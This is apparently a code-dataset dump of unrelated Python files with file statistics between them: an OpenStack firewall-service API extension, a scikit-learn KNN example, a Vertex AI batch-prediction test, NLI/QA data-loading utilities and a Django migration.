f_exc.FirewallGroupPortInvalidProject, 'FirewallGroupPortInvalidProject',
__name__)
FirewallGroupPortInUse = moves.moved_class(
f_exc.FirewallGroupPortInUse, 'FirewallGroupPortInUse', __name__)
FirewallPolicyNotFound = moves.moved_class(
f_exc.FirewallPolicyNotFound, 'FirewallPolicyNotFound', __name__)
FirewallPolicyInUse = moves.moved_class(
f_exc.FirewallPolicyInUse, 'FirewallPolicyInUse', __name__)
FirewallPolicyConflict = moves.moved_class(
f_exc.FirewallPolicyConflict, 'FirewallPolicyConflict', __name__)
FirewallRuleSharingConflict = moves.moved_class(
f_exc.FirewallRuleSharingConflict, 'FirewallRuleSharingConflict',
__name__)
FirewallPolicySharingConflict = moves.moved_class(
f_exc.FirewallPolicySharingConflict, 'FirewallPolicySharingConflict',
__name__)
FirewallRuleNotFound = moves.moved_class(
f_exc.FirewallRuleNotFound, 'FirewallRuleNotFound', __name__)
FirewallRuleInUse = moves.moved_class(
f_exc.FirewallRuleInUse, 'FirewallRuleInUse', __name__)
FirewallRuleNotAssociatedWithPolicy = moves.moved_class(
f_exc.FirewallRuleNotAssociatedWithPolicy,
'FirewallRuleNotAssociatedWithPolicy',
__name__)
FirewallRuleInvalidProtocol = moves.moved_class(
f_exc.FirewallRuleInvalidProtocol, 'FirewallRuleInvalidProtocol',
__name__)
FirewallRuleInvalidAction = moves.moved_class(
f_exc.FirewallRuleInvalidAction, 'FirewallRuleInvalidAction',
__name__)
FirewallRuleInvalidICMPParameter = moves.moved_class(
f_exc.FirewallRuleInvalidICMPParameter,
'FirewallRuleInvalidICMPParameter', __name__)
FirewallRuleWithPortWithoutProtocolInvalid = moves.moved_class(
f_exc.FirewallRuleWithPortWithoutProtocolInvalid,
'FirewallRuleWithPortWithoutProtocolInvalid', __name__)
FirewallRuleInvalidPortValue = moves.moved_class(
f_exc.FirewallRuleInvalidPortValue, 'FirewallRuleInvalidPortValue',
__name__)
FirewallRuleInfoMissing = moves.moved_class(
f_exc.FirewallRuleInfoMissing, 'FirewallRuleInfoMissing', __name__)
FirewallIpAddressConflict = moves.moved_class(
f_exc.FirewallIpAddressConflict, 'FirewallIpAddressConflict', __name__)
FirewallInternalDriverError = moves.moved_class(
f_exc.FirewallInternalDriverError, 'FirewallInternalDriverError', __name__)
FirewallRuleConflict = moves.moved_class(
f_exc.FirewallRuleConflict, 'FirewallRuleConflict', __name__)
FirewallRuleAlreadyAssociated = moves.moved_class(
f_exc.FirewallRuleAlreadyAssociated, 'FirewallRuleAlreadyAssociated',
__name__)
default_fwg_rules_opts = [
cfg.StrOpt('ingress_action',
default=api_const.FWAAS_DENY,
help=_('Firewall group rule action allow or '
'deny or reject for ingress. '
'Default is deny.')),
cfg.StrOpt('ingress_source_ipv4_address',
default=None,
help=_('IPv4 source address for ingress '
'(address or address/netmask). '
'Default is None.')),
cfg.StrOpt('ingress_source_ipv6_address',
default=None,
help=_('IPv6 source address for ingress '
'(address or address/netmask). '
'Default is None.')),
cfg.StrOpt('ingress_source_port',
default=None,
help=_('Source port number or range '
'(min:max) for ingress. '
'Default is None.')),
cfg.StrOpt('ingress_destination_ipv4_address',
default=None,
help=_('IPv4 destination address for ingress '
'(address or address/netmask). '
'Default is None.')),
cfg.StrOpt('ingress_destination_ipv6_address',
default=None,
help=_('IPv6 destination address for ingress '
'(address or address/netmask). '
'Default is None.')),
cfg.StrOpt('ingress_destination_port',
default=None,
help=_('Destination port number or range '
'(min:max) for ingress. '
'Default is None.')),
cfg.StrOpt('egress_action',
default=api_const.FWAAS_ALLOW,
help=_('Firewall group rule action allow or '
'deny or reject for egress. '
'Default is allow.')),
cfg.StrOpt('egress_source_ipv4_address',
default=None,
help=_('IPv4 source address for egress '
'(address or address/netmask). '
'Default is None.')),
cfg.StrOpt('egress_source_ipv6_address',
default=None,
help=_('IPv6 source address for egress '
'(address or address/netmask). '
'Default is None.')),
cfg.StrOpt('egress_source_port',
default=None,
help=_('Source port number or range '
'(min:max) for egress. '
'Default is None.')),
cfg.StrOpt('egress_destination_ipv4_address',
default=None,
help=_('IPv4 destination address for egress '
'(address or address/netmask). '
'Default is None.')),
cfg.StrOpt('egress_destination_ipv6_address',
default=None,
help=_('IPv6 destination address for egress '
'(address or address/netmask). '
'Default is None.')),
cfg.StrOpt('egress_destination_port',
default=None,
help=_('Destination port number or range '
'(min:max) for egress. '
'Default is None.')),
cfg.BoolOpt('shared',
default=False,
help=_('Firewall group rule shared. '
'Default is False.')),
cfg.StrOpt('protocol',
default=None,
help=_('Network protocols (tcp, udp, ...). '
'Default is None.')),
cfg.BoolOpt('enabled',
default=True,
help=_('Firewall group rule enabled. '
'Default is True.')),
]
firewall_quota_opts = [
cfg.IntOpt('quota_firewall_group',
default=10,
help=_('Number of firewall groups allowed per tenant. '
'A negative value means unlimited.')),
cfg.IntOpt('quota_firewall_policy',
default=10,
help=_('Number of firewall policies allowed per tenant. '
'A negative value means unlimited.')),
cfg.IntOpt('quota_firewall_rule',
default=100,
help=_('Number of firewall rules allowed per tenant. '
'A negative value means unlimited.')),
]
cfg.CONF.register_opts(default_fwg_rules_opts, 'default_fwg_rules')
cfg.CONF.register_opts(firewall_quota_opts, 'QUOTAS')
# TODO(Reedip): Remove the convert_to functionality after bug1706061 is fixed.
def convert_to_string(value):
if value is not None:
return str(value)
return None
firewall_v2.RESOURCE_ATTRIBUTE_MAP[api_const.FIREWALL_RULES][
'source_port']['convert_to'] = convert_to_string
firewall_v2.RESOURCE_ATTRIBUTE_MAP[api_const.FIREWALL_RULES][
'destination_port']['convert_to'] = convert_to_string
class Firewall_v2(extensions.APIExtensionDescriptor):
api_definition = firewall_v2
@classmethod
def get_resources(cls):
special_mappings = {'firewall_policies': 'firewall_policy'}
plural_mappings = resource_helper.build_plural_mappings(
special_mappings, firewall_v2.RESOURCE_ATTRIBUTE_MAP)
return resource_helper.build_resource_info(
plural_mappings, firewall_v2.RESOURCE_ATTRIBUTE_MAP,
fwaas_constants.FIREWALL_V2, action_map=firewall_v2.ACTION_MAP,
register_quota=True)
@classmethod
def get_plugin_interface(cls):
return Firewallv2PluginBase
@six.add_metaclass(abc.ABCMeta)
class Firewallv2PluginBase(service_base.ServicePluginBase):
def get_plugin_type(self):
return fwaas_constants.FIREWALL_V2
def get_plugin_description(self):
return 'Firewall Service v2 Plugin'
# Firewall Group
@abc.abstractmethod
def create_firewall_group(self, context, firewall_group):
pass
@abc.abstractmethod
def delete_firewall_group(self, context, id):
pass
@abc.abstractmethod
def get_firewall_group(self, context, id, fields=None):
pass
@abc.abstractmethod
def get_firewall_groups(self, context, filters=None, fields=None):
pass
@abc.abstractmethod
def update_firewall_group(self, context, id, firewall_group):
pass
# Firewall Policy
@abc.abstractmethod
def create_firewall_policy(self, context, firewall_policy):
pass
@abc.abstractmethod
def delete_firewall_policy(self, context, id):
pass
@abc.abstractmethod
def get_firewall_policy(self, context, id, fields=None):
pass
@abc.abstractmethod
def get_firewall_policies(self, context, filters=None, fields=None):
pass
@abc.abstractmethod
def update_firewall_policy(self, context, id, firewall_policy):
pass
# Firewall Rule
@abc.abstractmethod
def create_firewall_rule(self, context, firewall_rule):
pass
@abc.abstractmethod
def delete_firewall_rule(self, context, id):
pass
@abc.abstractmethod
def get_firewall_rule(self, context, id, fields=None):
pass
@abc.abstractmethod
def get_firewall_rules(self, context, filters=None, fields=None):
pass
@abc.abstractmethod
def update_firewall_rule(self, context, id, firewall_rule):
pass
@abc.abstractmethod
def insert_rule(self, context, id, rule_info):
pass
@abc.abstractmethod
def remove_rule(self, context, id, rule_info):
pass
| 38.323432 | 79 | 0.673527 | 1,161 | 11,612 | 6.445306 | 0.18863 | 0.013364 | 0.048109 | 0.051316 | 0.458773 | 0.362021 | 0.297875 | 0.289189 | 0.289189 | 0.246559 | 0 | 0.006266 | 0.244058 | 11,612 | 302 | 80 | 38.450331 | 0.846206 | 0.058388 | 0 | 0.384 | 0 | 0 | 0.239923 | 0.074936 | 0 | 0 | 0 | 0.003311 | 0 | 1 | 0.088 | false | 0.068 | 0.048 | 0.012 | 0.172 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4022d54aeba2badfe2c92ef3c771f491343dff82 | 1,919 | py | Python | teste/knn.py | joandesonandrade/nebulosa | 5bc157322ed0bdb81f6f00f6ed1ea7f7a5cadfe0 | [
"MIT"
] | null | null | null | teste/knn.py | joandesonandrade/nebulosa | 5bc157322ed0bdb81f6f00f6ed1ea7f7a5cadfe0 | [
"MIT"
] | null | null | null | teste/knn.py | joandesonandrade/nebulosa | 5bc157322ed0bdb81f6f00f6ed1ea7f7a5cadfe0 | [
"MIT"
] | null | null | null | from sklearn import preprocessing
import pandas as pd
import numpy as np
#import matplotlib.pyplot as plt
# Opening the data as a DataFrame
dados = pd.read_csv('dados/001.csv')
# Initializing the method to binarize the class: sim (yes)=1; não (no)=0
pre = preprocessing.LabelBinarizer()
# Binarizing the 'jogou' (played) class and assigning it to an n-dimensional array
y_binary = pre.fit_transform(dados['jogou'])
y = np.array(y_binary).ravel()
lista_clima = [x for x in dados['clima']]
lista_temperatura = [x for x in dados['temperatura']]
lista_jogou = [x for x in dados['jogou']]
pre = preprocessing.LabelEncoder()
clima_encoding = pre.fit_transform(lista_clima)
temperatura_encoding = pre.fit_transform(lista_temperatura)
jogou_encoding = pre.fit_transform(lista_jogou)
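# For illustration (the actual integer codes depend on the CSV contents):
# LabelEncoder assigns each distinct string an integer in sorted order, e.g.
# ['sol', 'chuva', 'sol'] -> [1, 0, 1]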
lista = list(zip(clima_encoding, temperatura_encoding, jogou_encoding))
X = np.array(lista, dtype=np.int32)
#colunas = ['A', 'B', 'C']
# print(pd.DataFrame(X, columns=colunas, dtype=np.int32))
# print(pd.DataFrame(y, columns=['Classe'], dtype=np.int32))
#
# xX = []
# for i, x in enumerate(X):
# xX.append([list(x), y[i][0]])
#
# dX = [(x[0][0] + x[0][1] + x[0][2]) for x in xX]
# dY = [x[1] for x in xX]
#
# print('Sum of labels:', dX)
# print('Class:', dY)
#
# fig, ax = plt.subplots()
# ax.plot(dX)
# ax.plot(dY)
# plt.show()
from sklearn import model_selection
from sklearn.metrics import accuracy_score
from sklearn.neighbors import KNeighborsClassifier
# Splitting the data: training gets 75% and test 25%; I always use this split :)
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.25, random_state=0)
# Creating the model, leaving the default parameters
knn = KNeighborsClassifier()
# Training the model
knn.fit(X=X_train, y=y_train)
# Evaluating the model's accuracy using the test data
pontuacao = str(accuracy_score(y_test, knn.predict(X_test)) * 100)
print("Precisão: "+pontuacao+"%")
| 28.641791 | 105 | 0.727983 | 308 | 1,919 | 4.422078 | 0.396104 | 0.013216 | 0.022026 | 0.015419 | 0.088106 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01804 | 0.133403 | 1,919 | 66 | 106 | 29.075758 | 0.800962 | 0.414278 | 0 | 0 | 0 | 0 | 0.045537 | 0 | 0 | 0 | 0 | 0.015152 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
40255e51d495409353d842161452761a11a4b039 | 8,940 | py | Python | components/google-cloud/tests/container/experimental/gcp_launcher/test_batch_prediction_job_remote_runner.py | m-mayran/pipelines | 4e89973504980ff89d896fda09fc29a339b2d744 | [
"Apache-2.0"
] | null | null | null | components/google-cloud/tests/container/experimental/gcp_launcher/test_batch_prediction_job_remote_runner.py | m-mayran/pipelines | 4e89973504980ff89d896fda09fc29a339b2d744 | [
"Apache-2.0"
] | null | null | null | components/google-cloud/tests/container/experimental/gcp_launcher/test_batch_prediction_job_remote_runner.py | m-mayran/pipelines | 4e89973504980ff89d896fda09fc29a339b2d744 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 The Kubeflow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test Vertex AI Batch Prediction Job Remote Runner Client module."""
import json
import os
import time
import unittest
from unittest import mock
from google.cloud import aiplatform
from google.cloud.aiplatform.compat.types import job_state as gca_job_state
from google.protobuf import json_format
from google_cloud_pipeline_components.proto.gcp_resources_pb2 import GcpResources
from google_cloud_pipeline_components.container.experimental.gcp_launcher import batch_prediction_job_remote_runner
from google_cloud_pipeline_components.container.experimental.gcp_launcher import job_remote_runner
class BatchPredictionJobRemoteRunnerUtilsTests(unittest.TestCase):
def setUp(self):
super(BatchPredictionJobRemoteRunnerUtilsTests, self).setUp()
self._payload = (
'{"batchPredictionJob": {"displayName": '
'"BatchPredictionComponentName", "model": '
'"projects/test/locations/test/models/test-model","inputConfig":'
' {"instancesFormat": "CSV","gcsSource": {"uris": '
'["test_gcs_source"]}}, "outputConfig": {"predictionsFormat": '
'"CSV", "gcsDestination": {"outputUriPrefix": '
'"test_gcs_destination"}}}}')
self._job_type = 'BatchPredictionJob'
self._project = 'test_project'
self._location = 'test_region'
self._batch_prediction_job_name = f'/projects/{self._project}/locations/{self._location}/jobs/test_job_id'
self._gcp_resources_path = 'gcp_resources'
self._batch_prediction_job_uri_prefix = f'https://{self._location}-aiplatform.googleapis.com/v1/'
def tearDown(self):
if os.path.exists(self._gcp_resources_path):
os.remove(self._gcp_resources_path)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
def test_batch_prediction_job_remote_runner_on_region_is_set_correctly_in_client_options(
self, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response = mock.Mock()
job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources_path)
mock_job_service_client.assert_called_once_with(
client_options={
'api_endpoint': 'test_region-aiplatform.googleapis.com'
},
client_info=mock.ANY)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
@mock.patch.object(os.path, 'exists', autospec=True)
def test_batch_prediction_job_remote_runner_on_payload_deserializes_correctly(
self, mock_path_exists, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response = mock.Mock()
job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
mock_path_exists.return_value = False
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources_path)
expected_parent = f'projects/{self._project}/locations/{self._location}'
expected_job_spec = json.loads(self._payload, strict=False)
job_client.create_batch_prediction_job.assert_called_once_with(
parent=expected_parent, batch_prediction_job=expected_job_spec)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
@mock.patch.object(os.path, 'exists', autospec=True)
def test_batch_prediction_job_remote_runner_raises_exception_on_error(
self, mock_path_exists, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response = mock.Mock()
job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_FAILED
mock_path_exists.return_value = False
with self.assertRaises(RuntimeError):
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources_path)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
@mock.patch.object(os.path, 'exists', autospec=True)
@mock.patch.object(time, 'sleep', autospec=True)
def test_batch_prediction_job_remote_runner_retries_to_get_status_on_non_completed_job(
self, mock_time_sleep, mock_path_exists, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response_success = mock.Mock()
get_batch_prediction_job_response_success.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
get_batch_prediction_job_response_running = mock.Mock()
get_batch_prediction_job_response_running.state = gca_job_state.JobState.JOB_STATE_RUNNING
job_client.get_batch_prediction_job.side_effect = [
get_batch_prediction_job_response_running,
get_batch_prediction_job_response_success
]
mock_path_exists.return_value = False
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources_path)
mock_time_sleep.assert_called_once_with(
job_remote_runner._POLLING_INTERVAL_IN_SECONDS)
self.assertEqual(job_client.get_batch_prediction_job.call_count, 2)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
@mock.patch.object(os.path, 'exists', autospec=True)
def test_batch_prediction_job_remote_runner_returns_gcp_resources(
self, mock_path_exists, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response_success = mock.Mock()
get_batch_prediction_job_response_success.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
job_client.get_batch_prediction_job.side_effect = [
get_batch_prediction_job_response_success
]
mock_path_exists.return_value = False
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources_path)
with open(self._gcp_resources_path) as f:
serialized_gcp_resources = f.read()
# Instantiate GCPResources Proto
batch_prediction_job_resources = json_format.Parse(
serialized_gcp_resources, GcpResources())
self.assertEqual(len(batch_prediction_job_resources.resources), 1)
batch_prediction_job_name = batch_prediction_job_resources.resources[
0].resource_uri[len(self._batch_prediction_job_uri_prefix):]
self.assertEqual(batch_prediction_job_name,
self._batch_prediction_job_name)
| 45.380711 | 115 | 0.794519 | 1,169 | 8,940 | 5.59367 | 0.179641 | 0.176633 | 0.211959 | 0.131213 | 0.669827 | 0.638324 | 0.590151 | 0.579599 | 0.579599 | 0.572106 | 0 | 0.001673 | 0.130872 | 8,940 | 196 | 116 | 45.612245 | 0.839897 | 0.075615 | 0 | 0.514286 | 0 | 0 | 0.086113 | 0.04148 | 0 | 0 | 0 | 0 | 0.05 | 1 | 0.05 | false | 0 | 0.085714 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
402c6d1527bb64bf420904254134ab7105236ec8 | 10,690 | py | Python | data_utils.py | algoprog/Quin | c1fd3b8e5e2163217f6c8062620ee0c1dfeed0e8 | [
"MIT"
] | 47 | 2020-08-02T12:28:07.000Z | 2022-03-30T01:56:57.000Z | data_utils.py | algoprog/Quin | c1fd3b8e5e2163217f6c8062620ee0c1dfeed0e8 | [
"MIT"
] | 4 | 2020-09-20T17:31:51.000Z | 2021-12-02T17:40:03.000Z | data_utils.py | algoprog/Quin | c1fd3b8e5e2163217f6c8062620ee0c1dfeed0e8 | [
"MIT"
] | 4 | 2020-11-23T15:47:34.000Z | 2021-03-30T02:02:02.000Z | import csv
import json
import pickle
import logging
import re
import pandas
import gzip
import os
import numpy as np
from random import randint, random
from tqdm import tqdm
from retriever.dense_retriever import DenseRetriever
from models.tokenization import tokenize
from typing import Union, List
class InputExample:
"""
Structure for one input example with texts, the label and a unique id
"""
def __init__(self, guid: str, texts: List[str], label: Union[int, float]):
"""
Creates one InputExample with the given texts, guid and label
str.strip() is called on each text.
:param guid
id for the example
:param texts
the texts for the example
:param label
the label for the example
"""
self.guid = guid
self.texts = [text.strip() for text in texts]
self.label = label
def get_texts(self):
return self.texts
def get_label(self):
return self.label
class LoggingHandler(logging.Handler):
def __init__(self, level=logging.NOTSET):
super().__init__(level)
def emit(self, record):
try:
msg = self.format(record)
tqdm.write(msg)
self.flush()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def get_examples(filename, max_examples=0):
examples = []
id = 0
with open(filename, encoding='utf8') as file:
for j, line in enumerate(file):
line = line.rstrip('\n')
sample = json.loads(line)
label = sample['label']
guid = "%s-%d" % (filename, id)
id += 1
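# 3-way NLI labels: entailment = 0, contradiction = 1, anything else
# (neutral, in SNLI-style data) = 2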
if label == 'entailment':
label = 0
elif label == 'contradiction':
label = 1
else:
label = 2
examples.append(InputExample(guid=guid,
texts=[sample['s1'], sample['s2']],
label=label))
if 0 < max_examples <= len(examples):
break
return examples
def get_qa_examples(filename, max_examples=0, dev=False):
examples = []
id = 0
with open(filename, encoding='utf8') as file:
for j, line in enumerate(file):
line = line.rstrip('\n')
sample = json.loads(line)
label = sample['relevant']
guid = "%s-%d" % (filename, id)
id += 1
examples.append(InputExample(guid=guid,
texts=[sample['question'], sample['answer']],
label=label))
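# when training, duplicate each positive pair 13 extra times,
# presumably to counter the positive/negative class imbalance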
if not dev:
if label == 1:
for _ in range(13):
examples.append(InputExample(guid=guid,
texts=[sample['question'], sample['answer']],
label=label))
if 0 < max_examples <= len(examples):
break
return examples
def map_label(label):
labels = {"relevant": 0, "irrelevant": 1}
return labels[label.strip().lower()]
def get_qar_examples(filename, max_examples=0):
examples = []
id = 0
with open(filename, encoding='utf8') as file:
for j, line in enumerate(file):
line = line.rstrip('\n')
sample = json.loads(line)
guid = "%s-%d" % (filename, id)
id += 1
examples.append(InputExample(guid=guid,
texts=[sample['question'], sample['answer']],
label=1.0))
if 0 < max_examples <= len(examples):
break
return examples
def get_qar_artificial_examples():
examples = []
id = 0
print('Loading passages...')
passages = []
file = open('data/msmarco/collection.tsv', 'r', encoding='utf8')
while True:
line = file.readline()
if not line:
break
line = line.rstrip('\n').split('\t')
passages.append(line[1])
print('Loaded passages')
with open('data/qar/qar_artificial_queries.csv') as f:
for i, line in enumerate(f):
queries = line.rstrip('\n').split('|')
for query in queries:
guid = "%s-%d" % ('', id)
id += 1
examples.append(InputExample(guid=guid,
texts=[query, passages[i]],
label=1.0))
return examples
def get_single_examples(filename, max_examples=0):
examples = []
id = 0
with open(filename, encoding='utf8') as file:
for j, line in enumerate(file):
line = line.rstrip('\n')
sample = json.loads(line)
guid = "%s-%d" % (filename, id)
id += 1
examples.append(InputExample(guid=guid,
texts=[sample['text']],
label=1))
if 0 < max_examples <= len(examples):
break
return examples
def get_qnli_examples(filename, max_examples=0, no_contradictions=False, fever_only=False):
examples = []
id = 0
with open(filename, encoding='utf8') as file:
for j, line in enumerate(file):
line = line.rstrip('\n')
sample = json.loads(line)
label = sample['label']
if label == 'contradiction' and no_contradictions:
continue
if sample['evidence'] == '':
continue
if fever_only and sample['source'] != 'fever':
continue
guid = "%s-%d" % (filename, id)
id += 1
examples.append(InputExample(guid=guid,
texts=[sample['statement'].strip(), sample['evidence'].strip()],
label=1.0))
if 0 < max_examples <= len(examples):
break
return examples
def get_retrieval_examples(filename, negative_corpus='data/msmarco/collection.tsv', max_examples=0, no_statements=True,
encoder_model=None, negative_samples_num=4):
examples = []
queries = []
passages = []
negative_passages = []
id = 0
with open(filename, encoding='utf8') as file:
for j, line in enumerate(file):
line = line.rstrip('\n')
sample = json.loads(line)
if 'evidence' in sample and sample['evidence'] == '':
continue
guid = "%s-%d" % (filename, id)
id += 1
if sample['type'] == 'question':
query = sample['question']
passage = sample['answer']
else:
query = sample['statement']
passage = sample['evidence']
query = query.strip()
passage = passage.strip()
if sample['type'] == 'statement' and no_statements:
continue
queries.append(query)
passages.append(passage)
if sample['source'] == 'natural-questions':
negative_passages.append(passage)
if max_examples == len(passages):
break
if encoder_model is not None:
# Load MSMARCO passages
logging.info('Loading MSM passages...')
with open(negative_corpus) as file:
for line in file:
p = line.rstrip('\n').split('\t')[1]
negative_passages.append(p)
logging.info('Building ANN index...')
dense_retriever = DenseRetriever(model=encoder_model, batch_size=1024, use_gpu=True)
dense_retriever.create_index_from_documents(negative_passages)
results = dense_retriever.search(queries=queries, limit=100, probes=256)
negative_samples = [
[negative_passages[p[0]] for p in r if negative_passages[p[0]] != passages[i]][:negative_samples_num]
for i, r in enumerate(results)
]
# print(queries[0])
# print(negative_samples[0][0])
for i in range(len(queries)):
texts = [queries[i], passages[i]] + negative_samples[i]
examples.append(InputExample(guid=guid,
texts=texts,
label=1.0))
else:
for i in range(len(queries)):
texts = [queries[i], passages[i]]
examples.append(InputExample(guid=guid,
texts=texts,
label=1.0))
return examples
def get_pair_input(tokenizer, sent1, sent2, max_len=256):
text = "[CLS] {} [SEP] {} [SEP]".format(sent1, sent2)
tokenized_text = tokenizer.tokenize(text)[:max_len]
indexed_tokens = tokenizer.encode(text)[:max_len]
segments_ids = []
sep_flag = False
for i in range(len(tokenized_text)):
if tokenized_text[i] == '[SEP]' and not sep_flag:
segments_ids.append(0)
sep_flag = True
elif sep_flag:
segments_ids.append(1)
else:
segments_ids.append(0)
return indexed_tokens, segments_ids
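# Illustrative output: for "[CLS] a b [SEP] c [SEP]" the segment ids are
# 0 for the "[CLS] a b [SEP]" span and 1 for the trailing "c [SEP]".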
def build_batch(tokenizer, text_list, max_len=256):
token_id_list = []
segment_list = []
attention_masks = []
longest = -1
for pair in text_list:
sent1, sent2 = pair
ids, segs = get_pair_input(tokenizer, sent1, sent2, max_len=max_len)
if ids is None or segs is None:
continue
token_id_list.append(ids)
segment_list.append(segs)
attention_masks.append([1] * len(ids))
if len(ids) > longest:
longest = len(ids)
if len(token_id_list) == 0:
return None, None, None
# padding
assert (len(token_id_list) == len(segment_list))
for ii in range(len(token_id_list)):
token_id_list[ii] += [0] * (longest - len(token_id_list[ii]))
# pad attention masks with 0 so the padded positions are masked out
attention_masks[ii] += [0] * (longest - len(attention_masks[ii]))
segment_list[ii] += [1] * (longest - len(segment_list[ii]))
return token_id_list, segment_list, attention_masks
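# Usage sketch (assumes a HuggingFace-style BERT tokenizer; illustrative only):
#   from transformers import BertTokenizer
#   tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
#   ids, segments, masks = build_batch(
#       tokenizer, [('is this relevant?', 'a candidate passage')], max_len=256)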
def load_unsupervised_dataset(dataset_file):
print('Loading dataset...')
x = pickle.load(open(dataset_file, "rb"))
print('Done')
return x, len(x[0])
def load_supervised_dataset(dataset_file):
print('Loading dataset...')
d = pickle.load(open(dataset_file, "rb"))
print('Done')
return d[0], d[1]
| 31.627219 | 119 | 0.528718 | 1,172 | 10,690 | 4.703925 | 0.180887 | 0.023943 | 0.017958 | 0.048975 | 0.40468 | 0.377109 | 0.363686 | 0.334482 | 0.310539 | 0.287321 | 0 | 0.014142 | 0.358372 | 10,690 | 337 | 120 | 31.721068 | 0.789619 | 0.034425 | 0 | 0.435115 | 0 | 0 | 0.057023 | 0.008705 | 0 | 0 | 0 | 0 | 0.003817 | 1 | 0.064886 | false | 0.072519 | 0.053435 | 0.007634 | 0.183206 | 0.022901 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
402d9bbc776d0b10c128c8af7e8de8955e864e57 | 327 | py | Python | hc/accounts/migrations/0025_remove_member_team.py | opsct/healthchecks | 069bc9b735c0473aed9946104ab85238d065bea1 | [
"BSD-3-Clause"
] | null | null | null | hc/accounts/migrations/0025_remove_member_team.py | opsct/healthchecks | 069bc9b735c0473aed9946104ab85238d065bea1 | [
"BSD-3-Clause"
] | 1 | 2021-06-10T23:14:00.000Z | 2021-06-10T23:14:00.000Z | hc/accounts/migrations/0025_remove_member_team.py | opsct/healthchecks | 069bc9b735c0473aed9946104ab85238d065bea1 | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 2.1.5 on 2019-01-22 08:33
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0024_auto_20190119_1540'),
]
operations = [
migrations.RemoveField(
model_name='member',
name='team',
),
]
